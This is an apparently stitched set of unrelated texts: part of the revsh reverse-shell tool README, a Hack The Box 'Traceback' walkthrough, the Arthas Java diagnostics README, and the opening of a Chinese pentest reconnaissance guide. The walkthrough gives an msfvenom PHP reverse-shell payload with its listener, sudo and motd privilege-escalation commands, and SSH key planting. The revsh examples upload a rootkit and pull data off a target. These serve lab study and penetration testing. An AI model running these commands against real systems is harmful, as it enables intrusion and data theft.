-x Disable automatic setup of proxies. (Defaults: Proxy D2280 and tun/tap devices.)
-b Start in bind shell mode. (Default is reverse shell mode.)
The -b flag must be invoked on both ends.
-n Non-interactive netcat style data broker. (Default is interactive w/remote tty.)
No tty. Useful for copying files.
-v Verbose. -vv and -vvv increase verbosity.
-V Print the program and protocol versions.
-h Print this help.
-e Print out some usage examples.
## Installation ##
First, you will need to build OpenSSL from source. (See __NOTE__ below.)
git clone https://github.com/openssl/openssl.git
cd openssl/
./config no-shared -static # These options are needed to build static applications against OpenSSL.
make && make test # We skip "make install" so we don't conflict with your systems default OpenSSL. We will build _revsh_ against the OpenSSL we just compiled in this tree.
cd ..
Now build revsh.
git clone https://github.com/emptymonkey/revsh.git
cd revsh
vi config.h # Set up new defaults that fit your situation.
vi Makefile # Check that the selected build environment is the one you want. (It probably already is by default.)
make # This *can* take a very long time, though it usually doesn't.
make install
vi ~/.revsh/rc # Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h
__NOTE:__ With the release of OpenSSL 1.1.0, OpenSSL needs to be built from source for use in a statically linked binary. Building a statically linked binary against the OpenSSL libraries that ship with most Linux distros (including Kali) will *not* work. (If it builds at all, it will SEGFAULT.)
## Examples ##
Control host example IP: 192.168.0.42
<br>
Target host example IP: 192.168.0.66
Interactive example on default port '2200':
control: revsh -c
target: revsh 192.168.0.42
Interactive example on non-standard port '443':
control: revsh -c 192.168.0.42:443
target: revsh 192.168.0.42:443
Bindshell example:
target: revsh -b
control: revsh -c -b 192.168.0.66
Non-interactive file upload example:
control: cat ~/bin/rootkit | revsh -c -n
target: revsh 192.168.0.42 > ./totally_not_a_rootkit
Non-interactive file download example:
control: revsh -c -n >payroll_db.tar
target: cat payroll_db.tar | revsh 192.168.0.42
Non-interactive file download example across existing tunnel:
control: revsh -c -n 127.0.0.1:2291 >payroll_db.tar
target: cat payroll_db.tar | revsh 127.0.0.1:2290
|
# Traceback
Machine IP: 10.10.10.181
# Enumeration
```s
nmap -sV -sC 10.10.10.181
```
Service detection: `-sV`
Output:
```s
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
`http-title` is interesting.
```s
nmap -sC -sV -A -v -p- -oA full_scan 10.10.10.181 -T4
```
No further interesting things.
# Port 80
Apache httpd 2.4.29 ((Ubuntu)) server on port 80. Have a visit: `http://10.10.10.181:80`.
Enumerating it further. Found the following stuff:
```s
http://10.10.10.181:80/icons/ 403 (Forbidden)
http://10.10.10.181:80/icons/small/ 403 (Forbidden)
http://10.10.10.181:80/index.html 200 (OK)
http://10.10.10.181:80/server-status 403 (Forbidden)
```
# Source-code (Foothold)
Sourcecode of the page says `<!--Some of the best web shells that you might need ;)-->`. On searching this along with `Xh4H`, we reach this [tweet](https://twitter.com/riftwhitehat/status/1237311680276647936?lang=en) by the same person pointing to a repo of some web shells. Searching these on the actual server, one hit is found.
```
http://10.10.10.181/smevk.php
```
Opening this file `smevk.php`, the username and password are `admin` and `admin`.
This is a pretty useless shell, except it has write access. So cool. Let us create a custom payload and send it there.
1. `msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.45 LPORT=1234 -f raw -o shell.php`
2. Set up a listener
```
use exploit/multi/handler
set LHOST 10.10.14.45
set LPORT 1234
set PAYLOAD php/meterpreter/reverse_tcp
exploit
```
3. Load `http://10.10.10.181/shell.php` in the browser.
4. Type `shell` to get a shell.
5. Upgrade the shell: `python3 -c 'import pty;pty.spawn("/bin/bash")'`
# Enumeration inside the system
Inside the home directory, there is this `webadmin` which has a `note.txt` which says:
```
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
```
Running `sudo -l` gives the following:
`(sysadmin) NOPASSWD: /home/sysadmin/luvit`
Running `sudo -u sysadmin /home/sysadmin/luvit` runs a lua file.
# Privelege escalation to user sysadmin
Spawn a shell:
```
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
```
Upgrade the shell using `python3 -c 'import pty;pty.spawn("/bin/bash")'`
Go to the `user.txt` in `home` to get the user flag.
# Privilege escalation to root
Further searching reveals `OpenSSH RSA public key` file in `.ssh` directory within `sysadmin` in `home`. Then tried to add a known host to those files for a passwordless login:
1. `ssh-keygen` on local system: generates private and public keys
2. Copy entire public key to the `sysadmin` `authorized_keys` on the remote end. `echo ... > authorized_keys`
3. Attempt login `ssh sysadmin@10.10.10.181` from your end. You will see `Welcome to Xh4H land`.
On further searching, found that these are located in `/etc/update-motd.d` as `00-header` which is writable by the group `sysadmin` and created by `root`.
1. Add `echo "cat root/root.txt" >> 00-header` (I guess this >> is there instead of > because we need to append not overwrite).
2. Re-attempt ssh login from the device. The hash gets printed.
And how exactly I searched? `linpeas` from [this link](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
) gave output that involved:
```
/bin/sh -c sleep 30 ; /bin/cp /var/backup/.update-motd.d/* /etc/update-motd.d/
```
Implies a shell script that after every 30 seconds copies the contents of backup motd to the main motd.
Sending `linpeas` over `nc` was not sufficient. Needed to:
1. `python -m SimpleHTTPServer 80` on the attacker machine.
2. `wget http://IP:80/linpeas.sh` and `sh linpeas.sh` |
## Arthas
![arthas](site/src/site/sphinx/arthas.png)
[![Build Status](https://github.com/alibaba/arthas/workflows/JavaCI/badge.svg)](https://github.com/alibaba/arthas/actions)
[![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas)
[![maven](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg)](https://search.maven.org/search?q=g:com.taobao.arthas)
![license](https://img.shields.io/github/license/alibaba/arthas.svg)
[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Average time to resolve an issue")
[![Percentage of issues still open](http://isitmaintained.com/badge/open/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Percentage of issues still open")
`Arthas` is a Java Diagnostic tool open sourced by Alibaba.
Arthas allows developers to troubleshoot production issues for Java applications without modifying code or restarting servers.
[中文说明/Chinese Documentation](README_CN.md)
### Background
Often times, the production system network is inaccessible from the local development environment. If issues are encountered in production systems, it is impossible to use IDEs to debug the application remotely. More importantly, debugging in production environment is unacceptable, as it will suspend all the threads, resulting in the suspension of business services.
Developers could always try to reproduce the same issue on the test/staging environment. However, this is tricky as some issues cannot be reproduced easily on a different environment, or even disappear once restarted.
And if you're thinking of adding some logs to your code to help troubleshoot the issue, you will have to go through the following lifecycle; test, staging, and then to production. Time is money! This approach is inefficient! Besides, the issue may not be reproducible once the JVM is restarted, as described above.
Arthas was built to solve these issues. A developer can troubleshoot your production issues on-the-fly. No JVM restart, no additional code changes. Arthas works as an observer, which will never suspend your existing threads.
### Key features
* Check whether a class is loaded, or where the class is being loaded. (Useful for troubleshooting jar file conflicts)
* Decompile a class to ensure the code is running as expected.
* View classloader statistics, e.g. the number of classloaders, the number of classes loaded per classloader, the classloader hierarchy, possible classloader leaks, etc.
* View the method invocation details, e.g. method parameter, return object, thrown exception, and etc.
* Check the stack trace of specified method invocation. This is useful when a developers wants to know the caller of the said method.
* Trace the method invocation to find slow sub-invocations.
* Monitor method invocation statistics, e.g. qps, rt, success rate and etc.
* Monitor system metrics, thread states and cpu usage, gc statistics, and etc.
* Supports command line interactive mode, with auto-complete feature enabled.
* Supports telnet and websocket, which enables both local and remote diagnostics with command line and browsers.
* Supports profiler/Flame Graph
* Support get objects in the heap that are instances of the specified class.
* Supports JDK 6+.
* Supports Linux/Mac/Windows.
### [Online Tutorials(Recommended)](https://arthas.aliyun.com/doc/arthas-tutorials.html?language=en)
* [Usages](tutorials/katacoda/README.md#online-tutorial-usages)
### Quick start
#### Use `arthas-boot`(Recommended)
Download`arthas-boot.jar`,Start with `java` command:
```bash
curl -O https://arthas.aliyun.com/arthas-boot.jar
java -jar arthas-boot.jar
```
Print usage:
```bash
java -jar arthas-boot.jar -h
```
#### Use `as.sh`
You can install Arthas with one single line command on Linux, Unix, and Mac. Copy the following command and paste it into the command line, then press *Enter* to run:
```bash
curl -L https://arthas.aliyun.com/install.sh | sh
```
The command above will download the bootstrap script `as.sh` to the current directory. You can move it any other place you want, or put its location in `$PATH`.
You can enter its interactive interface by executing `as.sh`, or execute `as.sh -h` for more help information.
### Documentation
* [Online Tutorials(Recommended)](https://arthas.aliyun.com/doc/arthas-tutorials.html?language=en)
* [User manual](https://arthas.aliyun.com/doc/en)
* [Installation](https://arthas.aliyun.com/doc/en/install-detail.html)
* [Download](https://arthas.aliyun.com/doc/en/download.html)
* [Quick start](https://arthas.aliyun.com/doc/en/quick-start.html)
* [Advanced usage](https://arthas.aliyun.com/doc/en/advanced-use.html)
* [Commands](https://arthas.aliyun.com/doc/en/commands.html)
* [WebConsole](https://arthas.aliyun.com/doc/en/web-console.html)
* [Docker](https://arthas.aliyun.com/doc/en/docker.html)
* [Arthas Spring Boot Starter](https://arthas.aliyun.com/doc/en/spring-boot-starter.html)
* [User cases](https://github.com/alibaba/arthas/issues?q=label%3Auser-case)
* [FAQ](https://arthas.aliyun.com/doc/en/faq)
* [Compile and debug/How to contribute](https://github.com/alibaba/arthas/blob/master/CONTRIBUTING.md)
* [Release Notes](https://github.com/alibaba/arthas/releases)
### Feature Showcase
#### Dashboard
* https://arthas.aliyun.com/doc/en/dashboard
![dashboard](site/src/site/sphinx/_static/dashboard.png)
#### Thread
* https://arthas.aliyun.com/doc/en/thread
See what is eating your CPU (ranked by top CPU usage) and what is going on there in one glance:
```bash
$ thread -n 3
"as-command-execute-daemon" Id=29 cpuUsage=75% RUNNABLE
at sun.management.ThreadImpl.dumpThreads0(Native Method)
at sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:440)
at com.taobao.arthas.core.command.monitor200.ThreadCommand$1.action(ThreadCommand.java:58)
at com.taobao.arthas.core.command.handler.AbstractCommandHandler.execute(AbstractCommandHandler.java:238)
at com.taobao.arthas.core.command.handler.DefaultCommandHandler.handleCommand(DefaultCommandHandler.java:67)
at com.taobao.arthas.core.server.ArthasServer$4.run(ArthasServer.java:276)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
at java.lang.Thread.run(Thread.java:745)
Number of locked synchronizers = 1
- java.util.concurrent.ThreadPoolExecutor$Worker@6cd0b6f8
"as-session-expire-daemon" Id=25 cpuUsage=24% TIMED_WAITING
at java.lang.Thread.sleep(Native Method)
at com.taobao.arthas.core.server.DefaultSessionManager$2.run(DefaultSessionManager.java:85)
"Reference Handler" Id=2 cpuUsage=0% WAITING on java.lang.ref.Reference$Lock@69ba0f27
at java.lang.Object.wait(Native Method)
- waiting on java.lang.ref.Reference$Lock@69ba0f27
at java.lang.Object.wait(Object.java:503)
at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:133)
```
#### jad
* https://arthas.aliyun.com/doc/en/jad
Decompile your class with one shot:
```java
$ jad javax.servlet.Servlet
ClassLoader:
+-java.net.URLClassLoader@6108b2d7
+-sun.misc.Launcher$AppClassLoader@18b4aac2
+-sun.misc.Launcher$ExtClassLoader@1ddf84b8
Location:
/Users/xxx/work/test/lib/servlet-api.jar
/*
* Decompiled with CFR 0_122.
*/
package javax.servlet;
import java.io.IOException;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
public interface Servlet {
public void init(ServletConfig var1) throws ServletException;
public ServletConfig getServletConfig();
public void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException;
public String getServletInfo();
public void destroy();
}
```
#### mc
* https://arthas.aliyun.com/doc/en/mc
Memory compiler, compiles `.java` files into `.class` files in memory.
```bash
$ mc /tmp/Test.java
```
#### retransform
* https://arthas.aliyun.com/doc/en/retransform
Load the external `*.class` files to retransform/hotswap the loaded classes in JVM.
```bash
retransform /tmp/Test.class
retransform -c 327a647b /tmp/Test.class /tmp/Test\$Inner.class
```
#### sc
* https://arthas.aliyun.com/doc/en/sc
Search any loaded class with detailed information.
```bash
$ sc -d org.springframework.web.context.support.XmlWebApplicationContext
class-info org.springframework.web.context.support.XmlWebApplicationContext
code-source /Users/xxx/work/test/WEB-INF/lib/spring-web-3.2.11.RELEASE.jar
name org.springframework.web.context.support.XmlWebApplicationContext
isInterface false
isAnnotation false
isEnum false
isAnonymousClass false
isArray false
isLocalClass false
isMemberClass false
isPrimitive false
isSynthetic false
simple-name XmlWebApplicationContext
modifier public
annotation
interfaces
super-class +-org.springframework.web.context.support.AbstractRefreshableWebApplicationContext
+-org.springframework.context.support.AbstractRefreshableConfigApplicationContext
+-org.springframework.context.support.AbstractRefreshableApplicationContext
+-org.springframework.context.support.AbstractApplicationContext
+-org.springframework.core.io.DefaultResourceLoader
+-java.lang.Object
class-loader +-org.apache.catalina.loader.ParallelWebappClassLoader
+-java.net.URLClassLoader@6108b2d7
+-sun.misc.Launcher$AppClassLoader@18b4aac2
+-sun.misc.Launcher$ExtClassLoader@1ddf84b8
classLoaderHash 25131501
```
#### vmtool
* https://arthas.aliyun.com/doc/en/vmtool
Get objects in the heap that are instances of the specified class.
```bash
$ vmtool --action getInstances --className java.lang.String --limit 10
@String[][
@String[com/taobao/arthas/core/shell/session/Session],
@String[com.taobao.arthas.core.shell.session.Session],
@String[com/taobao/arthas/core/shell/session/Session],
@String[com/taobao/arthas/core/shell/session/Session],
@String[com/taobao/arthas/core/shell/session/Session.class],
@String[com/taobao/arthas/core/shell/session/Session.class],
@String[com/taobao/arthas/core/shell/session/Session.class],
@String[com/],
@String[java/util/concurrent/ConcurrentHashMap$ValueIterator],
@String[java/util/concurrent/locks/LockSupport],
]
```
#### stack
* https://arthas.aliyun.com/doc/en/stack
View the call stack of `test.arthas.TestStack#doGet`:
```bash
$ stack test.arthas.TestStack doGet
Press Ctrl+C to abort.
Affect(class-cnt:1 , method-cnt:1) cost in 286 ms.
ts=2018-09-18 10:11:45;thread_name=http-bio-8080-exec-10;id=d9;is_daemon=true;priority=5;TCCL=org.apache.catalina.loader.ParallelWebappClassLoader@25131501
@test.arthas.TestStack.doGet()
at javax.servlet.http.HttpServlet.service(HttpServlet.java:624)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
...
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1121)
at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)
at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:745)
```
#### Trace
* https://arthas.aliyun.com/doc/en/trace
See what is slowing down your method invocation with trace command:
![trace](site/src/site/sphinx/_static/trace.png)
#### Watch
* https://arthas.aliyun.com/doc/en/watch
Watch the first parameter and thrown exception of `test.arthas.TestWatch#doGet` only if it throws exception.
```bash
$ watch test.arthas.TestWatch doGet {params[0], throwExp} -e
Press Ctrl+C to abort.
Affect(class-cnt:1 , method-cnt:1) cost in 65 ms.
ts=2018-09-18 10:26:28;result=@ArrayList[
@RequestFacade[org.apache.catalina.connector.RequestFacade@79f922b2],
@NullPointerException[java.lang.NullPointerException],
]
```
#### Monitor
* https://arthas.aliyun.com/doc/en/monitor
Monitor a specific method invocation statistics, including the total number of invocations, average response time, success rate, and every 5 seconds:
```bash
$ monitor -c 5 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello
Press Ctrl+C to abort.
Affect(class-cnt:1 , method-cnt:1) cost in 109 ms.
timestamp class method total success fail avg-rt(ms) fail-rate
----------------------------------------------------------------------------------------------------------------------------
2018-09-20 09:45:32 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.67 0.00%
timestamp class method total success fail avg-rt(ms) fail-rate
----------------------------------------------------------------------------------------------------------------------------
2018-09-20 09:45:37 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 1.00 0.00%
timestamp class method total success fail avg-rt(ms) fail-rate
----------------------------------------------------------------------------------------------------------------------------
2018-09-20 09:45:42 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.43 0.00%
```
#### Time Tunnel(tt)
* https://arthas.aliyun.com/doc/en/tt
Record method invocation data, so that you can check the method invocation parameters, returned value, and thrown exceptions later. It works as if you could come back and replay the past method invocation via time tunnel.
```bash
$ tt -t org.apache.dubbo.demo.provider.DemoServiceImpl sayHello
Press Ctrl+C to abort.
Affect(class-cnt:1 , method-cnt:1) cost in 75 ms.
INDEX TIMESTAMP COST(ms) IS-RET IS-EXP OBJECT CLASS METHOD
-------------------------------------------------------------------------------------------------------------------------------------
1000 2018-09-20 09:54:10 1.971195 true false 0x55965cca DemoServiceImpl sayHello
1001 2018-09-20 09:54:11 0.215685 true false 0x55965cca DemoServiceImpl sayHello
1002 2018-09-20 09:54:12 0.236303 true false 0x55965cca DemoServiceImpl sayHello
1003 2018-09-20 09:54:13 0.159598 true false 0x55965cca DemoServiceImpl sayHello
1004 2018-09-20 09:54:14 0.201982 true false 0x55965cca DemoServiceImpl sayHello
1005 2018-09-20 09:54:15 0.214205 true false 0x55965cca DemoServiceImpl sayHello
1006 2018-09-20 09:54:16 0.241863 true false 0x55965cca DemoServiceImpl sayHello
1007 2018-09-20 09:54:17 0.305747 true false 0x55965cca DemoServiceImpl sayHello
1008 2018-09-20 09:54:18 0.18468 true false 0x55965cca DemoServiceImpl sayHello
```
#### Classloader
* https://arthas.aliyun.com/doc/en/classloader
```bash
$ classloader
name numberOfInstances loadedCountTotal
BootstrapClassLoader 1 3346
com.taobao.arthas.agent.ArthasClassloader 1 1262
java.net.URLClassLoader 2 1033
org.apache.catalina.loader.ParallelWebappClassLoader 1 628
sun.reflect.DelegatingClassLoader 166 166
sun.misc.Launcher$AppClassLoader 1 31
com.alibaba.fastjson.util.ASMClassLoader 6 15
sun.misc.Launcher$ExtClassLoader 1 7
org.jvnet.hk2.internal.DelegatingClassLoader 2 2
sun.reflect.misc.MethodUtil 1 1
```
#### Web Console
* https://arthas.aliyun.com/doc/en/web-console
![web console](site/src/site/sphinx/_static/web-console-local.png)
#### Profiler/FlameGraph
* https://arthas.aliyun.com/doc/en/profiler
```bash
$ profiler start
Started [cpu] profiling
```
```
$ profiler stop
profiler output file: /tmp/demo/arthas-output/20211207-111550.html
OK
```
View profiler results under arthas-output via browser:
![](site/src/site/sphinx/_static/arthas-output-svg.jpg)
#### Arthas Spring Boot Starter
* [Arthas Spring Boot Starter](https://arthas.aliyun.com/doc/spring-boot-starter.html)
### Known Users
Arthas has more than 120 registered users, [View All](USERS.md).
Welcome to register the company name in this issue: https://github.com/alibaba/arthas/issues/111 (in order of registration)
![Alibaba](static/alibaba.png)
![Alipay](static/alipay.png)
![Aliyun](static/aliyun.png)
![Taobao](static/taobao.png)
![ICBC](static/icbc.png)
![雪球财经](static/xueqiu.png)
![顺丰科技](static/sf.png)
![贝壳找房](static/ke.png)
![vipkid](static/vipkid.png)
![百度凤巢](static/baidufengchao.png)
![有赞](static/youzan.png)
![科大讯飞](static/iflytek.png)
![智联招聘](static/zhaopin.png)
### Derivative Projects
* [Bistoury: A project that integrates Arthas](https://github.com/qunarcorp/bistoury)
* [A fork of arthas using MVEL](https://github.com/XhinLiang/arthas)
### Credits
#### Contributors
This project exists, thanks to all the people who contributed.
<a href="https://github.com/alibaba/arthas/graphs/contributors"><img src="https://opencollective.com/arthas/contributors.svg?width=890&button=false" /></a>
#### Projects
* [bytekit](https://github.com/alibaba/bytekit) Java Bytecode Kit.
* [greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy): The Arthas code base has derived from Greys, we thank for the excellent work done by Greys.
* [termd](https://github.com/alibaba/termd): Arthas's terminal implementation is based on termd, an open source library for writing terminal applications in Java.
* [crash](https://github.com/crashub/crash): Arthas's text based user interface rendering is based on codes extracted from [here](https://github.com/crashub/crash/tree/1.3.2/shell)
* [cli](https://github.com/alibaba/cli): Arthas's command line interface implementation is based on cli, open sourced by vert.x
* [compiler](https://github.com/skalogs/SkaETL/tree/master/compiler) Arthas's memory compiler.
* [Apache Commons Net](https://commons.apache.org/proper/commons-net/) Arthas's telnet client.
* [async-profiler](https://github.com/jvm-profiling-tools/async-profiler) Arthas's profiler command.
|
# Information Collection For Pentest
## 声明
```
Author:Qftm
Data:2020/01/18
```
## 正文
"只有不努力的黑客,没有攻不破的系统"。
在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。
Table of Contents
=================
- [收集域名信息](#收集域名信息)
- [Whois 查询](#whois-查询)
- [备案信息查询](#备案信息查询)
- [信用信息查询](#信用信息查询)
- [IP反查站点的站](#ip反查站点的站)
- [在线网站](#在线网站)
- [Dnslytics](#dnslytics)
- [浏览器插件](#浏览器插件)
- [myip.ms](#myip.ms)
- [TCPIPUTILS](#tcpiputils)
- [DNSlytics](#dnslytics-1)
- [收集相关应用信息](#收集相关应用信息)
- [微信公众号&微博](#微信公众号微博)
- [天眼查](#天眼查)
- [APP](#app)
- [七麦数据](#七麦数据)
- [AppStore](#appstore)
- [收集子域名信息](#收集子域名信息)
- [在线平台](#在线平台)
- [第三方平台查询](#第三方平台查询)
- [权重综合查询](#权重综合查询)
- [全国政府网站基本数据库](#全国政府网站基本数据库)
- [IP反查绑定域名网站](#ip反查绑定域名网站)
- [资产搜索引擎](#资产搜索引擎)
- [Google语法查询](#google语法查询)
- [FOFA语法查询](#fofa语法查询)
- [工具枚举](#工具枚举)
- [OneForAll](#oneforall)
- [Layer](#layer)
- [subDomainsBrute](#subdomainsbrute)
- [Sublist3r](#sublist3r)
- [证书透明度公开日志枚举](#证书透明度公开日志枚举)
- [在线第三方平台查询](#在线第三方平台查询)
- [工具枚举查询](#工具枚举查询)
- [Findomain](#findomain)
- [DNS历史解析](#dns历史解析)
- [DNS域传送漏洞](#dns域传送漏洞)
- [DNS记录分类](#dns记录分类)
- [DNS注册信息](#dns注册信息)
- [DNS域传送漏洞原理](#dns域传送漏洞原理)
- [DNS域传送漏洞检测](#dns域传送漏洞检测)
- [nslookup](#nslookup)
- [nmap](#nmap)
- [dig](#dig)
- [查找真实IP](#查找真实ip)
- [CDN简介](#cdn简介)
- [国内外CND](#国内外cnd)
- [判断目标是否存在CDN](#判断目标是否存在cdn)
- [Ping目标主域](#ping目标主域)
- [Nslookup](#nslookup-1)
- [不同DNS域名解析](#不同dns域名解析)
- [nslookup默认解析](#nslookup默认解析)
- [全国Ping](#全国ping)
- [站长工具](#站长工具)
- [17CE](#ce)
- [IPIP](#ipip)
- [工具查询](#工具查询)
- [Cdnplanet](#cdnplanet)
- [绕过CDN查找真实IP](#绕过cdn查找真实ip)
- [内部邮箱源](#内部邮箱源)
- [国外请求](#国外请求)
- [国际Ping](#国际ping)
- [国外DNS解析](#国外dns解析)
- [分站域名&C段查询](#分站域名c段查询)
- [分站域名](#分站域名)
- [C段查询](#c段查询)
- [网站漏洞](#网站漏洞)
- [一些测试文件](#一些测试文件)
- [SSRF漏洞](#ssrf漏洞)
- [查询域名解析记录](#查询域名解析记录)
- [目标网站APP应用](#目标网站app应用)
- [网络空间引擎搜索](#网络空间引擎搜索)
- [收集常用端口信息](#收集常用端口信息)
- [常见端口&解析&总结](#常见端口解析总结)
- [扫描工具](#扫描工具)
- [常用扫描工具](#常用扫描工具)
- [常用扫描工具使用](#常用扫描工具使用)
- [nmap](#nmap-1)
- [Masscan](#masscan)
- [Zmap](#zmap)
- [御剑高速TCP端口扫描工具](#御剑高速tcp端口扫描工具)
- [御剑高速端口扫描工具](#御剑高速端口扫描工具)
- [masnmapscan](#masnmapscan)
- [网络空间引擎搜索](#网络空间引擎搜索-1)
- [浏览器插件](#浏览器插件-1)
- [Shodan](#shodan)
- [TCPIPUTILS](#tcpiputils-1)
- [DNSlytics](#dnslytics-2)
- [指纹识别](#指纹识别)
- [第三方平台](#第三方平台)
- [工具](#工具)
- [浏览器插件](#浏览器插件-2)
- [Wappalyzer](#wappalyzer)
- [收集敏感信息](#收集敏感信息)
- [WAF识别](#waf识别)
- [wafw00f](#wafw00f)
- [源码泄露](#源码泄露)
- [常见源码泄露](#常见源码泄露)
- [源码泄露扫描工具](#源码泄露扫描工具)
- [源码泄露利用工具](#源码泄露利用工具)
- [备份文件泄露](#备份文件泄露)
- [网站备份文件泄露常见名称](#网站备份文件泄露常见名称)
- [网站备份文件泄露常见后缀](#网站备份文件泄露常见后缀)
- [网站备份文件泄露扫描工具](#网站备份文件泄露扫描工具)
- [Google Hacking](#google-hacking)
- [常用GoogleHacking语法](#常用googlehacking语法)
- [其他GoogleHacking语法](#其他googlehacking语法)
- [GoogleHacking典型用法](#googlehacking典型用法)
- [JS获取敏感接口](#js获取敏感接口)
- [JSFinder](#jsfinder)
- [LinkFinder](#linkfinder)
- [目录&后台扫描](#目录后台扫描)
- [越权查询](#越权查询)
- [代码托管](#代码托管)
- [Whois&备案查询](#whois备案查询)
- [公网网盘](#公网网盘)
- [凌风云搜索](#凌风云搜索)
- [网站截图](#网站截图)
- [webscreenshot](#webscreenshot)
- [获取公开文件](#获取公开文件)
- [snitch](#snitch)
- [Google Hacking](#google-hacking-1)
- [邮箱信息收集](#邮箱信息收集)
- [Infoga](#infoga)
- [Google Hacking](#google-hacking-2)
- [历史漏洞&资产](#历史漏洞资产)
# 收集域名信息
知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。
## Whois 查询
Whois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期、DNS等)。通过域名Whois服务器查询,可以查询域名归属者联系方式,以及注册和到期时间。
```
Kali下whois查询 https://www.kali.org/downloads/
域名Whois查询 - 站长之家 http://whois.chinaz.com/
Whois 爱站 http://whois.aizhan.com/
ip138 https://site.ip138.com/
Whois Lookup https://www.whois.net/
ICANN Lookup https://lookup.icann.org/
域名信息查询 - 腾讯云https://whois.cloud.tencent.com/domain?domain=
nicolasbouliane http://nicolasbouliane.com/utils/whois/?url=http://baidu.com
新网 whois信息查询 http://whois.xinnet.com/
IP WHOIS查询 - 站长工具 http://tool.chinaz.com/ipwhois/
```
![](img/1594459-20200119141241842-1090421140.png)
## 备案信息查询
国内网站注册需要向国家有关部门申请备案,防止网站从事非法活动,而国外网站不需要备案2333。
```
ICP备案查询网 http://www.beianbeian.com/
ICP备案查询 - 站长工具 http://icp.chinaz.com/
SEO综合查询 - 爱站 https://www.aizhan.com/seo/
批量查询 - 站长工具 http://icp.chinaz.com/searchs
工业和信息化部ICP/IP/域名信息备案管理 http://www.beian.miit.gov.cn/publish/query/indexFirst.action
```
![](img/1594459-20200119141328662-1538613661.png)
## 信用信息查询
国家企业信用信息公示系统 http://www.gsxt.gov.cn/index.html
全国企业信息查询 http://company.xizhi.com/
个人信用查询搜索-企业信息查询搜索-统一社会信用代码查询-信用中国 https://www.creditchina.gov.cn/
![](img/1594459-20200119141415498-1786131287.png)
## IP反查站点的站
### 在线网站
#### Dnslytics
Dnslytics地址:https://dnslytics.com/
利用Dnslytics反查IP可以得到如下信息
```
IP information
Network information
Hosting information
SPAM database lookup
Open TCP/UDP ports
Blocklist lookup
Whois information
Geo information
Country information
Update information
```
利用Dnslytics反查域名可以得到如下信息
```
Domain and Ranking Information
Hosting Information{
A / AAAA Record
NS Record
MX Record
SPF Record
}
Web Information
Whois Information
```
## 浏览器插件
通过Google、FireFox等插件的使用,收集域名信息
### myip.ms
![](img/1594459-20200119141519415-625881985.png)
### TCPIPUTILS
![](img/1594459-20200119141640228-860131966.png)
### DNSlytics
